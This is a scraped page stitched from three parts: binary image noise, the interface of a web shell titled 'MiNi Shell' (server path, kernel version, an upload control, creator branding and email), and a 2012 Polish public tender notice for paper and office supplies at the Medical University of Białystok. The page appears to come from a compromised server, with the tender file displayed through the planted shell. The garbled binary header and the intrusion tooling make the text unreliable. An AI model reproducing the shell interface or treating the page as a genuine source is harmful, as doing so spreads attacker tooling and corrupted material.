JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120912/343086-N-2012.html

<p class="kh_header"><b>Białystok: AZP/261/D/55/AZ 231/5/P/B/2012 - sukcesywne dostawy papieru ksero 
i papieru komputerowego oraz artykułów biurowych na potrzeby Uniwersytetu Medycznego w Białymstoku.</b><br>
<b>Numer ogłoszenia: 343086 - 2012; data zamieszczenia: 12.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AZP/261/D/55/AZ 231/5/P/B/2012 - sukcesywne dostawy papieru ksero 
i papieru komputerowego oraz artykułów biurowych na potrzeby Uniwersytetu Medycznego w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy papieru ksero i papieru komputerowego oraz artykułów biurowych na potrzeby Uniwersytetu Medycznego 
w Białymstoku przez okres 18 miesięcy od daty zawarcia umowy, z podziałem na dwie części:
Część 1 - sukcesywne dostawy papieru ksero i papieru komputerowego na potrzeby Uniwersytetu Medycznego w Białymstoku,
Szczegółowy opis przedmiotu zamówienia, wymagane parametry i wymagania ogólne przedmiotu zamówienia zawiera załącznik Nr 2 dotyczący - OPISU PRZEDMIOTU ZAMÓWIENIA/FORMULARZ CENOWY - Część 1, stanowiący integralną część SIWZ.  
Część 2 - sukcesywne dostawy artykułów biurowych na potrzeby Uniwersytetu Medycznego w Białymstoku,
Szczegółowy opis przedmiotu zamówienia, wymagane parametry i wymagania ogólne przedmiotu zamówienia zawiera załącznik Nr 2 dotyczący - OPISU PRZEDMIOTU ZAMÓWIENIA/FORMULARZ CENOWY - Część 2, stanowiący integralną część SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 21.12.25.69-2, 21.12.53.00-8, 21.12.00.00-0, 21.12.11.20-2, 30.19.20.00-1, 30.19.21.20-8, 30.19.21.30-0, 30.19.23.10-7, 30.19.21.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie jest wymagane wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Pzp o udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają następujące warunki dotyczące posiadania wiedzy i doświadczenia, tj: Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia. Przez dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia Zamawiający rozumie minimum 1 dostawę odpowiadającej swoim rodzajem dostawie stanowiącej przedmiot zamówienia w poszczególnych częściach, o wartości minimum: 
dla części 1 -  200 000,00 zł brutto; dla części 2 - 160 000,00 zł brutto. 
Wykonawca wskaże w wykazie dostaw - wartość, przedmiot zamówienia, daty wykonania i odbiorców oraz załączy dokumenty potwierdzające, że wykazane dostawy zostały zrealizowane należycie np. opinie, referencje, faktury, protokoły odbioru, przy czym dokumenty takie jak faktury, protokoły odbioru powinny potwierdzać należyte wykonanie zamówienia w sposób nie budzący wątpliwości, a zapisy w nich zawarte nie mogą ograniczać się jedynie do potwierdzenia ilości dostarczonego asortymentu;
Sposób dokonania oceny spełniania warunków wymaganych od Wykonawców nastąpi na podstawie dokumentów złożonych przez Wykonawców i oparty będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W CELU POTWIERDZENIA, ŻE OFEROWANE DOSTAWY ODPOWIADAJĄ WYMAGANIOM  OKREŚLONYM PRZEZ ZAMAWIAJĄCEGO, WYKONAWCA WINIEN ZAŁĄCZYĆ DO OFERTY:
1)Oświadczenie, że zaoferowany przedmiot zamówienia jest dopuszczony do obrotu na terytorium RP, posiada wszelkie wymagane przez przepisy prawa świadectwa, certyfikaty, atesty, deklaracje zgodności, itp. oraz spełnia wszelkie wymagane przez przepisy prawa wymogi w zakresie norm bezpieczeństwa obsługi, oraz, że dokumenty te dostarczy na każde żądanie Zamawiającego - na Formularzu ofertowym - Załącznik Nr 1 do SIWZ.  
2)W przypadku rozwiązań równoważnych wskazać (podać dokumenty tj. atesty polskie i europejskie, certyfikaty potwierdzające równoważność proponowanych przez Wykonawcę rozwiązań w trybie art. 29 ust. 3 ustawy - Prawo zamówień publicznych,  dołączając wykaz w/w dokumentów z podaniem nazwy podmiotu wydającego przedmiotowy dokument - (tylko w przypadku składania oferty równoważnej z opisem przedmiotu zamówienia).  
3)próbki - 1 szt. lub 1 opakowanie, odpowiednio:
w części 1 - poz. 3 i 4 po 1 ryzie, 
w części 2 - poz. 4, 14-18, 19, 21-23, 35, 36, 52, 88, 114, 115, 140.
Uwaga. W przypadku wątpliwości Zamawiający może zażądać dodatkowych dokumentów potwierdzających spełnianie parametrów/warunków, które zostały określone w Załączniku Nr 2 do SIWZ. Dokumenty zostaną udostępnione przez Wykonawców na każde żądanie Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INNE DOKUMENTY:
1) wypełniony przez Wykonawcę Formularz ofertowy - Załącznik Nr 1 do SIWZ,
2) pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w ust. 2. pkt  2)  tej części SIWZ - w oryginale lub poświadczone notarialnie;
3)wypełniony FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - Załącznik Nr 2 do SIWZ (w zależności od części zamówienia, w której Wykonawca składa ofertę), 
4)w przypadku, gdy osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcie aukcji elektronicznej, będzie inna osoba niż podpisująca ofertę, należy załączyć do oferty pełnomocnictwo dla tej osoby, zgodnie z w/w wymaganiami. W przypadku zmiany osoby uprawnionej do składania postąpień w toku aukcji elektronicznej, Wykonawca zobowiązany jest pisemnie powiadomić o takiej zmianie Zamawiającego na minimum jeden  dzień przed otwarciem aukcji - dotyczy części 1 postępowania,
5)w przypadku, jeśli Wykonawca będzie posługiwał się podpisem elektronicznym wystawionym  przez zagraniczny podmiot certyfikacyjny, Wykonawca zobowiązany jest dołączyć do oferty wzór takiego podpisu - dotyczy części 1 postępowania,
6) wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom (jeżeli są przewidywani - załączyć Załącznik Nr 5 do SIWZ),
7)wypełniony Załącznik Nr 8 do SIWZ - Wykaz zaoferowanych materiałów równoważnych - tylko w przypadku składania oferty równoważnej z opisem przedmiotu zamówienia; 
8)oświadczenie, że Wykonawca akceptuje warunek, iż zapłata za każdą zamawianą dostawę nastąpi w terminie do 30 dni licząc od daty otrzymania przez Zamawiającego faktury VAT i po odebraniu dostawy - na Formularzu ofertowym - Załącznik Nr 1 do SIWZ,
9)oświadczenie, że każdą zamawianą partię towaru Wykonawca zrealizuje w terminie maksymalnie 5 dni roboczych, licząc od daty otrzymania przez Wykonawcę zamówienia (fax lub e-mail) - na Formularzu ofertowym - Załącznik Nr 1 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod  rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.
2. Zmiana umowy jest możliwa w sytuacji, gdy:
a.konieczność zmiany wynika z okoliczności, których nie dało się przewidzieć 
w dacie zawarcia umowy, 
b.zmieniły się przepisy, których regulacje wpływają na prawa i obowiązki Stron - nie dotyczy ustawowej zmiany stawki podatku VAT,
c.zmiana jest korzystna dla Zamawiającego,
d.istnieje konieczność przesunięcia terminu wykonania umowy z przyczyn leżących po stronie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja ds. zamówień publicznych, pok. 12
Uniwersytet Medyczny w Białymstoku
ul. A. Mickiewicza 2C, 15-222 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 12:00, miejsce: Kancelaria Ogólna UMB (lewe skrzydło Pałacu Branickich, parter)
ul. Jana Kilińskiego 1, 15-089 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje, w części 1 postępowania, wybór najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.

Przedmiot zamówienia finansowany jest z projektów:
2.1. Opracowanie metody wykrywania markerów wskazujących na predyspozycję do rozwoju insulinooporności:
Część 1  - papier ksero A4 poz. 2 - 100 ryz,
Część 2 - segregator 7 cm poz.72 - 20 szt.
              - segregator 5 cm poz. 73 - 20 szt.
              - kartki samoprzylepne poz. 92- 40 szt.
              - koszulki do segregatora poz. 88- 50 op.
              - ofertówki sztywne przezroczyste poz. 90- 50op.
              - zakładki indeksujące poz. 132- 10 szt.
              - zszywki 24/6 poz. 69- 20 op.
              - koperty A4 poz. 26- 200 szt.
              - koperta A5 poz. 25- 200 szt.
              - koperta A3 poz. 27 - 100 szt.
              - koperta E4 RBD brązowa poz. 32 - 50 szt.
              - tusz do pieczątek poz. 133 - 3 szt.
              - spinacze małe poz. 66 - 20 op. 
              - spinacze duże poz. 67 - 20 op.
              - skoroszyt twardy poz. 105 - 200 szt.
              - długopis żelowy zielony poz. 17 - 100 szt.
              - długopis żelowy niebieski poz. 18 - 100 szt.
              - teczki kolorowe z gumką poz. 52 - 5 szt.
              - foliopisy poz. 19,20,21  - 40 szt.
              - ołówek z gumką  poz.98- 10 szt.
              - taśma klejąca dwustronna poz.61- 2 szt.
              - taśma pakowa poz.59- 10 szt.
              - nożyczki małe poz.96- 1 szt.
              - zszywacz poz.124- 2 szt.   
 2.2. Śródbłonek naczyniowy w chorobach cywilizacyjnych - od badań poznawczych do oferty innowacyjnego leku o działaniu śródbłonkowym:
Część 1 - papier ksero A4 poz. 4 - 50 ryz
Część 2 - teczki na gumkę poz. 52 - 15 szt.
              - koperty A4 poz. 26 - 50 szt.
              - koszulki do segregatora poz. 88 - 10 op. 
              - koperty małe poz. 28 - 20 szt.
              - długopis żelowy czarny poz. 15 - 20 szt.
              - długopis żelowy czerwony poz. 16 - 20 szt.
              - segregator 7 cm poz. 72 - 20 szt. 
              - taśma przezroczysta 48mm poz.60- 8 szt.
              - foliopis czarny poz. 19 - 20 szt.
              - korektor poz. 85 - 3 szt.
              - zszywki poz.69- 1 op.
              - kartki samoprzylepne poz.92- 10 op.
              - folia do faxu poz.48- 2 op.
2.3. Studiuję, badam, komercjalizuję - program wsparcia doktorantów UMB:
Część 1 - papier ksero A4 poz. 4 - 5 ryz
Część 2 - koszulki do segregatora poz. 88 - 3 op.
              - ofertówka twarda poz. 90 - 2 op..
              - segregator 7 cm poz.72 - 5 szt.
              - segregator 5 cm poz.73 - 5 szt.
              - skoroszyt poz. 106 - 4 op.
              - etykiety poz. 147 - 2 op.
2.4. Wdrożenie modeli zarządzania jakością w UMB:
Część 1 -  papier ksero A4- poz.4 - 30 ryz
Część 2 - segregator 5 cm poz.73 - 15 szt.
  - segregator 7cm poz.72- 15 szt.
  - koszulki poz.88- 20 op.
-	zakreślacz poz.116 - 5 szt.
-	marker poz.114 - 1 szt.
-	długopis żelowy poz.15 - 10 szt.
-	zszywki poz.69 - 3 szt.
-	klip poz.71- 3 op.
-	karteczki samoprzylepne poz.92 - 20 szt.
-	cienkopisy poz. 14 - 5 zst.
-	etykiety poz.147,149 - 2 op.
-	skoroszyt poz.106 - 2 op.
-	przekładki poz.68 - 5 szt.  
2.5. Ośrodek do analiz zagrożenia cywilizacyjnych lub środowiskowych i sposobów przeciwdziałania:
Część 1 - papier ksero A4 poz.4 - 60 ryz
              - papier ksero A3 poz.1- 1 ryza
Część 2 - długopis żelowy poz.18- 8 szt.
              - karteczki samoprzylepne poz.92- 10 szt.
              - klej poz.35- 2 szt.
              - klipy poz71- 6 op.
              - koperty A4 poz.26- 100 szt.
              - koperty małe poz.28- 100 szt.
              - korektor poz. 86- 2 szt.
              - koszulki poz.88 - 20 op.
              - mazaki poz.129-4 szt.
              - ofertówka poz.90- 20 szt.
              - ołówek poz100- 20 szt.
              - segregator 7cm poz.72- 20 szt.
              - segregator 5cm poz.73- 20 szt.
              - skoroszyt poz. 105,106- 80 szt.
              - spinacze poz. 66,67 - 8 op.
              - taśma klejąca poz. 55, 59- 6 szt.
              - teczka poz.50,52- 10 szt.
              - temperówka poz.140- 1 szt.
              - zakładki indeksujące poz.132-4 op.
               - zakreślacz poz.116- op.2
               - zszywki poz.69- 4 op..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - sukcesywne dostawy papieru ksero i papieru komputerowego na potrzeby Uniwersytetu Medycznego w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy papieru ksero i papieru komputerowego na potrzeby Uniwersytetu Medycznego w Białymstoku. Szczegółowy opis przedmiotu zamówienia, wymagane parametry i wymagania ogólne przedmiotu zamówienia zawiera załącznik Nr 2 dotyczący - OPISU PRZEDMIOTU ZAMÓWIENIA/FORMULARZ CENOWY - Część 1, stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 21.12.25.69-2, 21.12.53.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - sukcesywne dostawy artykułów biurowych na potrzeby Uniwersytetu Medycznego w Białymstoku,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów biurowych na potrzeby Uniwersytetu Medycznego w Białymstoku,
Szczegółowy opis przedmiotu zamówienia, wymagane parametry i wymagania ogólne przedmiotu zamówienia zawiera załącznik Nr 2 dotyczący - OPISU PRZEDMIOTU ZAMÓWIENIA/FORMULARZ CENOWY - Część 2, stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 21.12.00.00-0, 21.12.11.20-2, 30.19.20.00-1, 30.19.21.20-8, 30.19.21.30-0, 30.19.23.10-7, 30.19.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com